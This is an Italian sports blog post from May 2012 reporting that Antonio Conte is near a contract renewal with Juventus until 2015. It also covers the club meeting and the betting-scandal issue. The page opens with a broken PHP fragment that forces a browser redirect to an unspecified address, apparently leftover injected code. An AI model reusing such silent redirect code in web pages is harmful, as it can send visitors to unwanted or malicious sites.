location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Conte, rinnovo a un passo Nuovo contratto sino al 2015

Ads 468x60px

Random Post

Template Updates

mercoledì 23 maggio 2012

Conte, rinnovo a un passo Nuovo contratto sino al 2015


L'allenatore della Juventus si è presentato in sede questa mattina alle 10.45, ad attenderlo Agnelli, Marotta, e Nedved: accordo raggiunto, si attende solo l'ufficialità. Del Piero: futuro in Inghilterra o Stati Uniti

Antonio Conte è ad un passo dal rinnovo con la Juventus, l'ufficialità è attesa nelle prossime ore, il nuovo accordo scadrà nel 2015 con ingaggio raddoppiato a 3 milioni di euro a stagione.
LA GIORNATA — L'allenatore juventino si è presentato in sede questa mattina alle 10.45, ad attenderlo Andrea Agnelli, Beppe Marotta, Fabio Paratici e Pavel Nedved. Il vertice è durato qualche ora, sul tavolo non solo i termini del rinnovo contrattuale (già discussi e accettati da giorni), ma le strategie operative di mercato, la scelta del prossimo ritiro (scendono le quotazioni di Chatillon e riprendono quota quelle di Bardonecchia), e la questione delicata del Calcioscommesse. Nel pomeriggio Conte ha abbandonato corso Galileo Ferraris per un blitz a Vinovo, mentre in sede è proseguita la riunione operativa alla presenza dello staff medico e tecnico. Dopo i rinnovo di Matri, Bonucci, Barzagli, De Ceglie e Quagliarella quello di Conte è arrivato quasi in automatico, dopo una stagione esaltante culminata con lo scudetto.

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text